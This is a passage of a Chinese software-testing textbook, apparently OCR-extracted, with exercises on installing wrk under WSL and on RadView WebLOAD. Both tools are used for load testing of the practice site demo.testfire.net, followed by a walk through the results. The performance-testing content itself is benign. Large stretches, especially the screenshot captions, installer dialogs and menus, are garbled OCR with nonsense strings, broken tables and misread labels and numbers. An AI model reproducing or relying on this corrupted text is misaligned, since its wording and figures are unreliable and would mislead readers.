É Mozila Firefox 570 (x64 zh-CN) Mozila 207p 139MB 570 
E Mozila Maintenance Service Mozila 20/09 zmka sio 


当前 安装 的 程序 “三 大 小 265GB 
gv 








图 20-13 ”选中 “适用 于 Linux 的 Windows + £ 5t" 





mone - ) 
+ ü sm — p! arere r] 





Bm € BE Wiodows Ti 


Q ARARAT Windows 108 Windows 已 完成 请求 的 更 改 , 


Woedows SERGRE ESULE NE REB. | Exe. 
^ = ^ 
383 MB 11002000 
E 
mame 10013 
159 MB 52 
wame 52 
328M8 3101 
181 MB 550288247 
166MB 61030 
3)0MB 125442 
110 MB 90307296161 
939 KB 90307296161 
mame 10040219 
150 MB 10040219 
205 MB 110610000 
wame 10610300 


Eom | 7 vo 


ZB 570 














图 20-14 系统 完成 更 新 后 单 击 “ 立 即 重新 启动 "按钮 
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Ë` 


(& 打开 Microsoft Store. 18 4€ Ubuntu, 如 图 20-15 所 示 。 





€ ^ MeoskSte - u x 


主页 Nm dos Ubuntu 2 @ i 






C:\> f£ Windows 上 运行 
Linux ? 是 的 。 


安装 Ubuntu, openSUSE, SLES 和 Fedora 并 在 通用 于 Linux 的 
Windows 子 系统 WSD 上 并 排 运行 它们 . 





E] E urs E31 Eun Eu E] amm AUTE 





图 20-15 搜索 Ubuntu 


所“ 获取 ”按钮 ,如 图 20-16 所 示 。 





主页 mH me m= ° @ u 


Ubuntu 

Canonical Group Limited « skies 201 

BERT ESEGODENMENUD t. 

QD ffi Windows repas e ak iore eceis, Oe DNGENIC 


免费 下 载 


描述 设备 支持 


ubuntu? 


Ubuntu on Windows allows one to use Ubuntu Terminal and run Ubuntu =P 
command line utilities including bash, ssh, git, apt and many more. 


To launch, use "ubuntu" on the command-line prompt (cmd.exel, or click on the 
Ubuntu tile in the Start Menu. 


To use this feature, one first needs to use "Tum Windows features on or off and 
select "Windows Subsystem for Linux”, click OK reboot, and use this app. 


The above step can also be performed using Administrator PowerShell prompt- 
更 多 





图 20-16 获取 Ubuntu 
@ 获取 过 程 需要 花 时 间 等 待 ,如 图 20-17 所 示 o 


(3) 在 “开始 "菜单 中 找到 Ubuntu 并 运行 ,第 一 次 运行 时 会 自动 安装 Ubuntu 镜像 ,如 
图 20-18 所 示 。 
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i 应 用 
Ubuntu 
IR. 
描述 


Ubuntu on Windows 


“ommand line utilities i 





à kika 20 





图 20-17 获取 过 程 页 面 





@ Ubuntu 





图 20-18 自动 安装 Ubuntu 镜像 
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安装 提示 输入 用 户 名 ,如 图 20-19 所 示 。 





@ test@DESKTOP-SGSEAM; - n 






图 20-19 ”提示 输入 用 户 名 


的 步 





- 样 ,如 图 20 





(4) wrk 的 安装 步骤 和 在 Linux 中 安装 


E) testODESKTOP-SGSEAM3: /mnt/d 


TE 
ading pa 





Fd 20-20 ”安装 wrk 过 程 1 





而 IBitestODESKTOP-SGSEAM3: /mnt/d/vrk n x 


urpvr 


ILDN 











E 20-21 安装 wrk 过 程 2 
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20.3 用 wrk 测试 testfire 网 站 性 能 


接 下 来 为 testfire 网 站 首页 做 一 个 性 能 测试 ,首页 网 址 为 http://demo. testfire. net, 
CD 在 shell 中 输入 命令 wrk -t12 -c100 -d30s http://demo. testfire. net. 如 图 20-22 
所 示 。 
$ wrk -t12 -c100 -d30s http://demo.testfire.net 


图 20-22 输入 命令 


(2) 按 Enter 键 ,30s 以 后 可 以 看 到 输出 结果 如 图 20-23 所 示 。 


Running 30s test @ http://demo.testfire.net 
12 threads and 100 connections 
Thread Stats Avg Stdev Max +/- Stdev 
Latency 334.75ms 194.58ms 1.95s 89.93% 
Req/Sec 25.75 11.98 70.00 59.73% 


8988 requests in 30.04s, 85.15MB read 

Socket errors: connect 0, read 0, write 0, timeout 3 
Requests/sec: 299.24 
Transfer/sec: 2.83MB 





图 20-23 输出 结果 


先 来 解释 一 下 输出 

(D 12 threads and 100 connections ,意思 是 用 12 个 线程 模拟 100 T 对 应 的 -t 和 -c 
可 以 控制 这 两 个 参数 。 一 般 线程 数 不 宜 过 多 , 核 数 的 2 一 4 倍 足 够 了 ,多 了 反而 因为 线程 切 
换 过 多 造成 效率 降低 。 因 为 wrk 不 是 使 用 每 个 连接 一 个 线程 的 模型 ,而 是 通过 异步 网 络 io 

提升 并 发 量 ,所 以 网 络 通信 不 会 阻塞 线程 执行 ,这 也 是 wrk 可 以 用 很 少 的 线程 模拟 大 量 网 

路 连接 的 原因 。 而 现在 很 多 性 能 工具 并 没有 采用 这 种 方式 ,而 是 采用 提高 线程 数 来 实现 高 
并 发 ,所 以 并 发 量 一 旦 设 得 很 高 ,测试 机 自身 压力 就 很 大 ,测试 效果 反而 下 降 。 

© 线程 数 统计 如 图 20-24 所 示 。 











Thread Stats Avg Stdev Max +/- Stdev 


Latency  334.75ms 194.58ms 1.95s 89 
Req/Sec 25.75 11.98 70.00 59 





图 20-24 ”线程 数 统计 


Latency: "nm 寺 间 ,有 平均 值 \ 标 准 值 , 最 大 值 、 正 负 一 个 标准 差 占 比 。 

Req/Sec: 每 个 线程 每 秒 完成 的 请 求 数 ,同样 有 平均 值 . 标 准 值 .最 大 值 . 正 负 一 个 标准 
3h Hb. 

- 般 主要 关注 平均 值 和 最 大 值 ,标准 差 如 果 太 大 说 明 样本 本 身 离散 程度 比较 高 ,有 可 能 

系统 性 能 波动 很 大 。 

© 请 求 数 和 读 取 数 据 量 如 图 20-25 所 示 。 

从 图 20-25 中 可 看 出 ,共用 时 30. 04s 完成 请 求 数 和 读 取 数 据 量 ,请 求 数 为 8988, 读 取 数 
据 量 为 85.15 MB; 然后 是 错误 统计 ,可 以 看 到 连接 和 读 写 都 没有 错误 ,出 现 3 个 超时 ; 最 
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8988 requests in 30.04s, 85.15MB read 
Socket errors: connect 0, read 0, write 0, timeout 3 


Requests/sec: 299.24 
Transfer/sec: 2.83MB 


图 20-25 请求 数 和 读 取 数据 量 





后 是 所 有 线程 总 共 平 均 每 秒 完成 299. 24 个 请 求 , 每 秒 读 取 2. 83 MB 数据 量 。 
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通过 一 个 简单 的 测试 可 以 看 到 ,wrk 只 需要 一 个 命令 就 可 以 完成 基本 的 性 能 测试 ,对 于 
一 些 比 较 紧急 的 项 目 是 非常 有 用 的 。wrk 不 仅 适合 测试 人 员 使 用 ,而 且 适 合 开发 人 员 使 用 ， 
因为 开发 人 员 在 开发 项 目 过 程 中 没有 时 间 去 学 习 传 统 的 性 能 测试 工具 ,也 没有 那么 多 时 间 
来 进行 性 能 测试 ,而 wrk 只 需要 一 个 命令 就 可 以 知道 项 目 性 能 是 否 达 标 。 


w 拓展 训练 


使 用 wrk 工具 对 本 书 实验 1 中 提供 的 网 站 进行 性 能 测试 ,并 对 比分 析 测 试 结果 。 
HE.: 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 性 能 测试 工具 的 使 用 。 
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读书 笔记 
A e@; eó; e@; eó; e@; eó: e@; eó; e@; eó; e@; eó; e@; 


读书 笔记 Name: Date: 








励志 名 句 : When all else is lost the future still remains. 





就 是 失去 了 一 切 别 的 ,也 还 有 未 来 。 
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WebLOAD 是 RedView 公司 推出 的 Web 性 能 测试 工具 套件 之 
一 。WebLOAD 可 以 同时 模拟 多 个 终端 用 户 的 行为 ,对 Web 站 点 、 中 
间 件 ,应 用 程序 及 后 台数 据 库 进行 测试 。WebLOAD 在 模拟 用 户 行 
为 时 ,不仅 可 以 复 现 用 户 鼠 标 单 击 、 键 盘 输入 等 动作 ,还 可 以 对 动态 
Web 页 面 根据 用 户 行为 而 显示 的 不 同 内 容 进行 验证 ,达到 交互 式 测 
试 的 目的 。 在 测试 过 程 中 , WebLOAD 支持 不 同 的 模拟 用 户 调用 不 
同 的 脚本 ,模拟 不 同 的 行为 。WebLOAD 还 可 以 提供 详尽 的 测试 结 
果 分 析 报 告 ,帮助 用 户 判 定 Web 应 用 的 性 能 并 诊断 测试 过 程 遇 到 的 
问题 。 


21.1 WebLOAD 工作 原理 


WebLOAD 通过 生成 模拟 实现 负载 的 客户 端 来 测试 Web 应 用 程 
序 ,虚拟 客户 端 通过 在 Web 应 用 程序 执行 典型 的 动作 来 模仿 人 们 的 
操作 。 当 增加 虚拟 客户 端 时 ,系统 上 的 负载 相应 增加 ,用 户 可 以 创建 
定义 虚拟 客户 端 行 为 的 可 视 化 的 基于 JavaScript 的 测试 脚本 ,让 
WebLOAD 执行 这 些 脚 本 ,以 图 形 和 统计 的 形式 监控 程序 的 反应 ,并 
且 实 时 生成 测试 结果 。WebLOAD 包含 延展 性 测试 进程 中 的 功能 检 
验 ,允许 用 户 准 确 地 检验 Web 应 用 程序 ,在 定义 好 的 压力 条 件 下 ,每 
个 客户 端 ,每 个 事务 、 每 个 实体 级 别 都 具有 较 好 的 延展 性 和 完整 性 。 
WebLOAD 保存 包含 压力 机 的 数据 和 主机 硬件 性 能 监控 的 测试 结 
果 。WebLOAD 工作 原理 如 图 21-1 所 示 。 

测试 员 可 以 以 表格 或 者 图 形 的 形式 实时 查看 所 有 中 间 数 据 , 或 在 
测试 会 话 完成 后 查看 。 
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"A" ES uses 
E: nternet/Intrane! 
服务 器 


f 
负载 生成 器 | 
(合成 Web 客 户 端 ) 










Internet/Intranet 


£e webLOAD 监听 器 


图 21-1 WebLOAD 工作 原理 


21.2 WebLOAD 安装 


WebLOAD 的 安装 非常 简单 ,具体 步骤 如 下 。 
CD 双击 安装 文件 , 单 击 Next 按钮 ,如 图 21-2 所 示 。 





(jJ Setup - RadView WebLOAD Professional ten 








Welcome to the RadView 
WebLOAD Professional Setup 
Wizard 


This wil install RadView WebLOAD Professional version. 
11.0.0.063 on your computer. 


Tt is recommended that you dose all other applcations before. 
continuing. 


Chick Next to continue, or Cancel to exit Setup. 





图 21-2 # Next 按钮 


(2) 选择 I accept the agreement 单 选 按钮 , 单 击 Next 按钮 ,如 图 21-3 所 示 。 

(3) 选择 安装 目录 , 单 击 Next 按钮 ,如 图 21-4 所 示 。 

(4) 选择 安装 组 件 , 单 击 Next 按钮 ,如 图 21-5 所 示 。 

(5) 选择 主 文件 名 , 单 击 Next 按钮 ,如 图 21-6 所 示 。 

(6) 单 击 Install 按钮 开始 安装 ,如 图 21-7 所 示 。 

(7) 稍 等 一 会 儿 ,安装 完成 ,如 图 21-8 所 示 。 

(8) Mih Finish 按钮 ,如 图 21-9 所 示 。 

(9) 在 Update License 对 话 框 ( 见 图 21-10) 中 选择 Free Edition 版 本 ,默认 是 Use a 


license file, 
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3B Setup - RedView WebLOAD Professional Qe E: 





License Agreement. 
Please read the folowing important information before continuing. 





Please read the folowing License Aoreement. You must accept the terms of this 
agreement before continuing with the instalation. 





RADVIEW SOFTWARE Ë 


READ CAREFULLY BEFORE USING THE SOFTWARE 
PRODUCT. THIS IS A LEGAL AGREEMENT BETWEEN YOU 
(WHETHER AN INDIVIDUAL OR A FORMAL LEGAL ENTITY) 
("CUSTOMER") AND RADVIEW SOFTWARE LTD, WITH HEAD 


JOFFICES AT 14 HAMELACHA STREET, ROSH-HAAYIN, ISRAEL — 
op DADMIFW. SOETWADF INC WITH HFAN OFFICES AT 004 


© 1 accept the agreement. 
© 1 do not accept the agreement 





Cue] 



































图 21-3 选择 I accept the agreement 单 选 按钮 





L Setup wil nstal RadView WebLOAD Professional nto the folowing folder. 


To continue, dick Next. If you would ike to select a different folder, dick Browse. 
di Program Fies (x86) RadViewWebLOAD 








Atleast 0.8 MB of free disk space is required. 























图 21-4 选择 安装 目录 





Select the components you want to install; dear the components you do not want to 
install. Chick Next when you are ready to continue. 

© Ful Installation 

© Load Generator only 

© Dashboard Server 





[7] Console 
[Z] Load Generator 
Load Generator As Service 
f] WebLOAD Dashboard 
E WebLOAD Dashboard As Service. 
RI] Analytics PostgreSQL Database 











Current selection requires at least 2,063.6 MB of dsk space. 








ETENIM 








图 21-5 选择 安装 组 件 
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[jl Setup - RadView WebLOAD Professional 





Select Start Menu Folder 
Where shouid Setup place the program's shortcuts? 


i Setup wil create the program's shortcuts in the folowing Start Menu folder. 


To continue, cick Next. If you would ike to select a different folder, dick Browse. 








Setup - RadView WebLOAD Professional 











Ready to Install 
Setup is now ready to begin instaling RadView WebLOAD Professional on your 
computer. 


Chck Instal to continue with the instalation, or dick Back If you want to review or 

change any settings. 
Destination location: 
d: Program Fies (x85) WadViewWebLOAD. 








Ae Setup —ssssssw——.Q... ..., 


Instaling 
Iniiaksing the database cluster [this may take a few minutes} 














图 21-8 安装 完 





二 Setup - RadView WebLOAD Professional 








Completing the RadView 
WebLOAD Professional Setup 
Wizard 


Setup has finished instaling RadView WebLOAD Professional 
on your computer. The application may be launched by 
selecting the installed shortcuts. 


kk Finish to exit Setup. 








图 21-9 单 击 Finish 按钮 





实验 21 性 能 测试 工具 WebLOAD 训练 A 








à Update cen —M —U— 


Creating & E | 


© Free Edition 
© Use a icense fid 
© Connect to the WebRM License Server. | 


9j Help ~ 


























图 21-10 Update License 对 话 框 


因为 WebLOAD 不 是 开源 工具 ,需要 输入 License 文件 ,此 处 先 选择 Free Edition 版 本 
来 讲解 (Free Edition 版 本 最 多 只 能 设置 50 个 虚拟 用 户 ) 。 


21.3 WebLOAD 界面 介绍 


打开 WebLOAD, 主 界面 ( 见 图 21-11) 的 布局 和 功能 和 LoadRunner 差不多 。1 为 创建 
和 编辑 脚本 ,2 为 创建 和 运行 负载 测试 ,3 为 分 析 负 载 测试 结果 ,如 图 21-11 所 示 。 

CD 单 击 1 创建 和 编辑 脚本 ,打开 WebLOAD IDE 界面 ,如 图 21-12 所 示 。 

由 WebLOAD IDE 界面 可 以 知道 这 个 IDE 主要 就 是 录制 和 编辑 脚本 ,在 这 个 界面 中 ， 
顶部 是 主 菜单 ,包括 File( 文 件 ).Home( 主 页 )、Edit( 编 辑 ).Debug( 调 试 ) Session (A&W), 
View( 视 图 )、Tools( 工 具 )。 每 个 主 菜单 下 分 别 有 很 多 命令 。 

File 菜单 : 脚本 文件 的 新 建 、 打 开 、 保 存 和 打印 ,如 图 21-13 所 示 。 

Home 菜单 : 脚本 的 模型 .录制 .工具 和 执行 ,如 图 21-14 所 示 。 

Edit 菜单 : 包括 剪贴 板 、 编 辑 和 JavaScript, 如 图 21-15 所 示 。 

Debug 菜单 : 包括 执行 脚本 、 调 试 和 调试 窗口 设置 ,如 图 21-16 所 示 。 

Session 菜单 如 图 21-17 所 示 。 
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m Configure + — & Help ~ 
































图 21-11. WebLOAD 主 界面 
-一 一 一 一 一 一 一 一 -一 一 
e EE = [mr 
Fie | Home dt Debug Sesion View Tools nap- € ~ &x|| 
eoo ^» b & 0o00 
Visusl| Ful | Start Stop Pause Rum Stop Abort 
jenda] Script v 
Moo Recordwo 
Toolbox Assistant ax 
4 Geor ”sa e 
I: The IDE' Assistant view will hel 
7s Assistant view wi 
eue crest cod le scii in a few simple 
S JovaScriptObject steps. 
9 Comment Watch the Script cteation video 
T tutorial 
1 Recording Y 
2. Correlation v 
d 
3. Validation Y 
4. Parameterization an) 




























When these steps are completed, your 
Agenda Script will be ready to be used 
as part of a Load Test. You can now 

launch the WebLOAD Console from the 
IDE and start defining your Load-Test 



















图 21-12 WebLOAD IDE 界面 
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Home 





Script 


图 21-13 File 菜单 


Edt 


Validation E 


Fol | sen Stop Pause re er Run Stop Abort 


Recordirg sesi Execution 


图 21-14 Home 菜单 





r % cut qa Q Su Replace (w Redo d Import JavaScript File 
Perte a Copy Hed Fnd "9979 ÜR Select All 2 Clear JavaScript Editor 


Clipboard 


Al "Undo KDelete (Sj Syntax Checker. 
Editing JavaScript 


21-15 Edit 菜单 








File Home Edi | Debug Session View Tools 











ooo 


Run 


Stop Abort 





SE Step Into (@ Break Execution 的 Disable/Enable Breakpoints 
点 Step Over @ Toggle Breakpoint Edit Breakpoints 


QB Step Out (8 Remove All Breakpoints 


Debug 


Watch Window 
Variables Window 
Call Stack 





图 21-16 Debug 菜单 


Ele Home Edit Debug Session ^ View ^ Tools 





s 


Start 
Edit Mode 


JI Side by Side 
JE Compare HTML 


HTMLcompare 














图 21-17 Session 菜单 
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View 菜单 如 图 21-18 所 示 , 










WebLOAD IDE - WebLOAD IDE Project - [JavaScript View] 
File Home Edit Debug Session View Tools 


v] Page View `v HTTP Headers View Log View = = tm 


DOM View [v] JavaScript View v] Find View 


Cascade Tile Tile 
v] HTML View |v] Assistant. v] Toolbox Horizontally Vertically 
Agenda Views Window 





图 21-18 View 菜单 
Tools 菜单 : 基本 设置 和 打开 负载 控制 台 , 如 图 21-19 所 示 。 


= — —n 
WebLOAD IDE - WebLOAD IDE Project - [JavaScript View] 


Home Edt Debug Session View | Tools 


国 Current Project Options ip Recording and Script Generation Options @ 


= Proj 7 
B ] Dolac roject Options CSS DAD 
fid Settings. Console 
Load 





图 21-19 Tools 菜单 
(2) 单 击 2 创建 和 运行 负载 测试 ,打开 界面 如 图 21-20 Bros s 


uu — E == 








P ü & 图 Agendas Selection — WS schedule 
Load Machine Selection X Delete 
WebLOAD Goal-Oriented paronae — Add Remote | Ñicsd Madi Lor 
| Wizard Test Wizard Ma Measurements Manager PMM.. | [Mix Creation 
De Performance Monitos tat 


























|, 


图 21-20 ”创建 和 运行 负载 测试 界面 


G) 单 击 3 分 析 负 载 测试 结果 ,打开 界面 如 图 21-21 所 示 。 
因为 现在 没有 测试 ,所 以 界面 是 空 的 ,具体 参考 后 面 的 实例 讲解 。 





实验 21 性 能 测试 工具 WebLOAD 训练 ”、365 


pm 





/Amnam 
Ab Report" x @@ 9 = 5 











Sh Report 1 























b DÉ Server Side Statistics 
b [f Session Comparison 

b [f Static Templates 

b [Ü Statistical Correlation 
> EÉ Transaction Analysis 


























图 21-21 分析 负载 测试 结果 界面 


21.4 WebLOAD 实战 


使 用 WebLOAD 时 测试 的 一 般 步 骤 如 下 。 

(1) 创建 一 个 议程 (Agenda) 。 

(2) 使 用 WebLOAD 向 导 配 置 压 力 模板 ,配置 会 话 选项 。 

(3) 运行 测试 。 

(4) 分 析 测 试 结果 。 

下 面 使 用 testfire 网 站 http://demo. testfire. net 进行 实战 讲解 。 


21.4.1 创建 一 个 议程 


CD 选择 “开始 ”>“ 所 有 程序 ”RadView 一 i What would you like to do? 
WebLOAD-- WebLOAD IED. 1] JE WebLOAD 
IDE 界面 ,如 图 21-22 所 示 。 

(2) 选择 Create a new project. WebLOAD 
IDE 界面 将 以 编辑 模式 打开 ,以 供 开始 创建 议程 ， iia d 
参见 图 21-12。 

(3) 在 主 窗口 中 , 单 击 Start Pel @ .弹出 如 
图 21-23 所 示 的 对 话 框 。 21-22 打开 WebLOAD IDE 界面 





> Create a new project 


* Open an existing project 


回 Don't ask me again 
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(4) 单 击 OK 按钮 , WebLOAD IDE 开始 录制 在 浏览 器 中 的 所 有 操作 ,会 弹出 
WebLOAD Recording 工具 栏 ,如 图 21-24 所 示 ,并 且 打 开 浏览 器 。 





























WebLOAD Recording 
|«o00$279-9 


图 21-23 Recording 对 话 框 21-24 WebLOAD Recording 工具 栏 





(5) 在 打开 的 浏览 器 中 ,输入 测试 网 站 http: //demo. testfire. net, 如 图 21-25 所 示 。 
[ ————— 9 加 
Qo e -o| [me._ p- 


(B Altoro Mutual 
文件 (F) WWE) SEV) GERA 工具 (T) MHH 


AltoroMutual > 

































Sian In | Contact Us | Feedback | Search 


i 










No stamps, envelopes, or checks. 
to write give you more time to 










resources that you need to help 
secure your information and keep. 
3t confidential, This is our 

promise. 









Business Credit Cards 

You're always looking for ways to 
improve your company's bottom 
line. You want to be informed, 



















21-25 输入 测试 网 站 


(6) 浏览 网 站 ,执行 要 测试 的 操作 。 例 如 ,在 搜索 框 中 输入 test; 输入 用 户 名 和 密码 , 单 
击 登录 。 

在 浏览 网 站 时 ,操作 将 被 记录 并 显示 在 议程 树 (Agenda Tree) 中 ,如 图 21-26 所 示 ( 如 果 
在 议程 树 中 看 到 具有 不 同 URL 的 其 他 节点 , 则 可 能 是 浏览 器 插件 或 扩展 程序 生成 的 ) 。 

(7) 在 WebLOAD Recording 工具 栏 中 单 击 Stop Record 按钮 日 。 

(8) 在 WebLOAD IDE 界面 选择 File>Save 命令 ,保存 录制 好 的 Agenda, 

(9) 在 “另存 为 ”对 话 框 中 输入 Search 作为 议程 的 名 称 , 然 后 单 击 “ 保 存 ” 按 钮 。 议 程 保 
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http///demo.testfire.net/ 

E Sleep 

(Qj http;//demo.testfire.net/bank/login.aspx 
E Sleep 

Ñ| http;//demo.testfire.net/bank/login.aspx 





图 21-26 议程 树 


存 为 扩展 名 为 . wlp 的 文件 。 
现在 就 有 了 一 个 可 以 在 WebLOAD 测试 配置 中 使 用 的 基本 议程 。 可 以 在 已 经 创建 好 
的 议程 中 进行 编辑 或 者 添加 新 的 Agenda。 


21.4.2 使 用 WebLOAD 向 导 配 置 压力 模板 


在 WebLOAD 控制 台中 使 用 WebLOAD 向 导 配 置 加 载 模板 步骤 如 下 。 

CD 打开 WebLOAD 向 导 。 选 择 * 开 始 ” 一 “所 有 程序 "一 RadView 一 WebLOAD 一 
WebLOAD Console, 打 开 WebLOAD Console 界面 ,弹出 WebLOAD Console 对 话 框 , 如 
图 21-27 所 示 。 





r 1 
WebLOAD Console J 





@ What would you like to do? 


œ Create a new template using WebLOAD Wizard 


* Create a new template using the Goal-Oriented Test 
Wizard 


* Create a new template manually 
* Open an existing template 


> Open an existing load session 














Don't ask me again [7] 











图 21-27 WebLOAD Console 对 话 框 


选择 Create a new template using WebLOAD Wizard, 打开 WebLOAD Wizard 对 话 
框 , 单 击 Next 按钮 ,如 图 21-28 Bros 。 

(2) 测试 类 型 有 Single Agenda( 单 一 议程 ) 和 多 议程 (Mix of Agenda)。 本 例 选择 
Single Agenda, 然 后 单 击 Next 按钮 ,如 图 21-29 Bros 。 

两 种 类 型 的 区 别 如 下 。 

Single Agenda; 创建 只 有 一 个 Agenda 脚本 的 压力 模板 ,所 有 的 虚拟 用 户 都 对 这 个 脚 
本 进行 负载 测试 。 

Mix Of Agendas: 创建 多 个 Agenda 脚本 ,模拟 用 户 的 不 同 活动 。 
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Welcome to the WebLOAD 
Wizard 


The WebLOAD Wizard walks you step-by-step through 
the process of configuring a load session, 
enabling you to create and save a load template. 


Each screen in the WebLOAD Wizard contains text 
explaining the configuration process. 


Note: Before you can use the WebLOAD Wizard to 
configure 

a test session, you must first create the Agenda 
you 

want to use. Agendas should be created using the 
YebLDAD IDE 











图 21-28 WebLOAD Wizard 对 话 框 


Selecting the Type of Test to Run 
What type of test do you want to run? 





WebLOAD supports two types of 


@ Single Agenda 
An Agenda is the name of the test script you create with the WebLOAD IDE, 


with which you test your application. Choosing this option will create a 
load test where all Virtual Clients will run the same Agenda. 


© Mix o£ Agendas 


This ix a combination of Agendas, each created separately with the WebLDAD 
IDE. Each Agenda within a Mix simulates a different user profile (or group 
business process. Combining these different Agendas into a single Mix allows 
you to define the same load schedule for all of them. The next step in this 
of each Agenda in the Mix. This controls the volume of the load that each 
business process will create as part of the complete load test. 


Select the Type of Test to Run and 


























21-29 选择 测试 类 型 


选择 刚刚 保存 好 的 Agenda 文件 Search. wlp, 如 图 21-30 所 示 。 
(3) 单 击 Next 按钮 后 ,出 现 选 择 主机 对 话 框 ,如 图 21-31 所 示 。 
单 击 Add 按钮 可 以 添加 主机 , 单 击 Delete 按钮 可 以 删除 选中 的 主机 。 
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Selecting the Agenda/Hix to run 
Browse the files in your system and select the Agenda/Mix to run. 








Click the browse button to select the Agenda that you want to run. 


Click Options to set preferences for the selected Agenda, and click View to open the 
Agenda. 





Agenda: ~ C:AXUsersVlo Documents WebLOADSessi ons VSearch. wlp |" 




















me Jm) (0m) (onm J 





图 21-30 选择 刚刚 保存 好 的 Agenda 文件 Search. wlp 


Selecting Hosts 
Select the hosts to use to generate Virtual Clients and bombard the application a" 
Vader test. 





Select a host from the Most computers list and press the single arrow key adjacent to the 
Load Machine or Probing Clients window to assign the host to act az a Load Machine or 


Host computers: Load Machines: 
localhost 

















Probing Client Machines: 















































图 21-31 选择 主机 对 话 框 


主机 分 两 种 : 压力 机 和 探测 客户 机 。 从 主机 列表 中 可 以 选择 多 个 主机 作为 压力 机 ,每 
个 压力 机 生产 多 个 虚拟 用 户 ,至 少 要 有 一 个 压力 机 ; 探测 客户 机 是 一 个 虚拟 用 户 的 实例 , 完 
全 模拟 人 的 活动 ,和 虚拟 机 一 样 “ 炮 艇 ”Web 应 用 程序 ,测试 其 性 能 。 
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这 里 直接 使 用 本 机 进行 压力 测试 ,直接 单 击 Next 按钮 即 可 。 
(4) 选择 测试 计划 ,如 图 21-32 所 示 。 


Scheduling the Test Session 
How do you want to distribute the load? 





The first step in scheduling a load test session is defining how to 
distribute the load among the selected Load Machines. Tou can choose to 
separately or make a single definition that will be applied to all 
machines, distributing the load evenly between them. 


© Individual schedul 
Select this option to define an individual load schedule for each 
Load Machine in your Load Template. 


@ Collective scheduli 
Select this option to define a Lond schedule for all Load Machines, Keep in mind 
that using this option, the total amount of Virtual Clients defined, will be 
equally split among all Load Machines. 











图 21-32 选择 测试 计划 
(5) 安排 测试 并 选择 要 运行 的 虚拟 客户 端的 数量 ,如 图 21-33 所 示 。 


Specify the total number of Virtual Clients to run on each all Load Machines, 
or click Load Profiler to use a predefined scheduling model. Either way, the 
defined number of Virtual Clients will be distributed evenly among all Load 

Machines. 


Scheduling the Load Test Session Collectively a 





For each all Load Machine enter the starting and ending times in the From and To fields. 
In the Virtual Clients field, enter the number of Virtual Clients participating in the 
You can add segments to the load test by clicking Add or Copy and Paste. 





















































图 21-33 安排 测试 并 选择 要 运行 的 虚拟 客户 端的 数量 
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选中 要 设置 的 机 器 后 , 单 击 Load Profiler 按钮 ,弹出 Load Profiler 对 话 框 , 如 图 21-34 
所 示 o 
在 Load Profiler 对 话 框 中 ,选择 测试 计划 模板 ,包括 以 下 类 型 ,如 图 21-35 所 示 。 



































Starting number of Vitual Chents 
Concluding number ol Virtual Clients 














[Renee ] (Cancel | 








图 21-34 Load Profiler 对 话 框 图 21-35 选择 测试 计划 模板 


一 般 选 择 第 一 个 类 型 一 一 Linear( 线 性 递增 ) 。 

然后 需要 设置 负载 测试 时 间 ,比如 设置 为 5min。 

设置 开始 的 虚拟 用 户 数 为 5。 

设置 结束 时 虚拟 用 户 数量 为 50。 

设置 后 单 击 Append 按钮 即 可 。 

(6) 单 击 Next 按钮 ,弹出 Performance Measurements Manage 对 话 框 ,如 图 21-36 所 
示 。 单 击 Finish 按钮 即 可 。 


Performance Measurements Manager 
Click Add Monitors to configure the performance statistics to monitor and a" 
display in real-time during your test session. Tou can set WeblDAD to monitor 
statistics from your application server, database, and Web server 












































21-36 Performance Measurements Manage 对 话 框 
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(7) 在 Completing the WebLOAD 界面 中 单 击 Finish 按钮 ,如 图 21-37 所 示 。 


Completing the WebLOAD 


You have successfully completed the YebLDAD 


You have crested a basic Load Template that 
cen be used to test your Web application. 


[g]To run this Load Template immediately, 
select this box and then click Finish 


To close the wizard, click 








<Back J Finish ) (Cancel J (Hep - 





图 21-37 Completing the WebLOAD 界面 
弹出 对 话 框 提 示 是 否 保存 ,选择 后 即 可 开始 测试 。 
21.4.3 运行 测试 
选择 保存 文件 后 ,出 现 如 图 21-38 所 示 的 对 话 框 。 


Load Session StatUp in progress.. 





21-38 选择 保存 文件 后 界面 


开始 运行 压力 模板 ,并 得 到 实时 跟踪 的 测试 结果 ,如 图 21-39 所 示 。 
之 前 设置 的 是 5 个 用 户 开 始 线 性 递增 至 最 多 50 个 虚拟 用 户 , 测 试 时 间 为 5min。 所 以 
5min 后 结束 测试 并 且 产 生 测 试 报告 。 


21.4.4 ”分析 测 试 结果 


(1) 压力 模板 测试 完成 后 ,会 自动 弹出 提示 对 话 框 ,如 图 21-40 所 示 。 

(2) 单 击 Launch WebLOAD Analytics 按钮 ,弹出 提示 对 话 框 ,如 图 21-41 所 示 。 
(3) 单 击 “ 是 ”按钮 ,输入 报告 名 称 .保存 成 功 即 可 。 

(4) 查看 报告 ,如 图 21-42 所 示 。 
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Corrert Slice Sum (Current Value) 
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图 21-39 实时 跟踪 的 测试 结果 
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Load session execution completed. 








x Next. launch WebLOAD Analytics to 


To open your current session in WebLOAD Analytics, 


|) ir ilts. f 
W \ analyze your load test results. duces rukaq | 
Do you want to save your session now? | 

= Launch WebLOAD Analytics 























ET 
Show this dialog every time WebLOAD session is completed. | | | 





























图 21-40 Analytics 提示 对 话 框 21-41 WebLOAD Console 提示 对 话 框 


可 以 看 到 WebLOAD 的 报告 是 非常 丰富 的 。WebLOAD 能 够 在 测试 会 话 执行 期 间 对 
监测 的 系统 性 能 生成 实时 的 报告 ,这 些 测试 结果 通过 一 个 易 读 的 图 形 界面 显示 出 来 ,并 可 以 
导出 为 Excel 或 其 他 格式 的 文件 。 


DS 专家 点 评 


相 比 LoadRunner, WebLOAD 支持 的 协议 要 少 一 些 , 但 是 WebLOAD 的 功能 还 是 比较 
全 面 的 。WebLOAD IDE 类 似 于 LR 中 的 VUGen. WebLOAD Console 类 似 于 LR 中 的 
Controller,WebLOAD Analytics 类 似 于 LR 中 的 Analysis。 

WebLOAD IDE 中 的 Agenda Tree 十 Execution View+ Browser View 类 似 于 LR 中 的 
TreeView 视图 。WebLOAD 的 脚本 采用 的 是 JavaScript。WebLOAD 的 设计 理念 就 是 从 
最 基本 的 层面 开始 测试 网 站 ,精确 地 找到 瓶颈 并 解决 问题 ,有 很 高 的 灵活 性 和 扩展 性 ,结合 
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Connections 
图 Response Time Breakdown 
E] HTP Responses 

R] HTP Errors Over Time 

E] Errors and Warnings 


Log Summary 
E] Total Page Time 
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503 End 17-1225 508 Duration 000502 
Max Virtual Clients 49 Total Throughput (MB) 1927 


11111 -Total 


Total Warnings. o 
